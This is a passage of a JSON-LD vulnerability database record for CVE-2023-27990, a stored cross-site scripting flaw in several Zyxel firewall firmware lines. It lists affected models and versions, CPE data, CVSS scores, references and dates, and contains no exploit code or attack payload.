        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-1906",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "cve": "CVE-2023-27990",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2023-27990",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-27990",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-27990",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1972",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The cross-site scripting (XSS) vulnerability in Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker with administrator privileges to store malicious scripts in a vulnerable device. A successful XSS attack could then result in the stored malicious scripts being executed when the user visits the Logs page of the GUI on the device. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL A cross-site scripting vulnerability exists in the product.Information may be obtained and information may be tampered with",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-27990"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-27990",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-27990",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27990"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "id": "VAR-202304-1906",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2024-02-03T22:35:22.246000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235575"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-xss-vulnerability-and-post-authentication-command-injection-vulnerability-in-firewalls"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-27990"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-27990/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27990"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-27990"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-27990"
          },
          {
            "date": "2023-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "date": "2023-04-24T18:15:09.440000",
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-25T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-27990"
          },
          {
            "date": "2023-12-05T03:46:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          },
          {
            "date": "2023-05-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          },
          {
            "date": "2024-02-02T17:08:15.513000",
            "db": "NVD",
            "id": "CVE-2023-27990"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
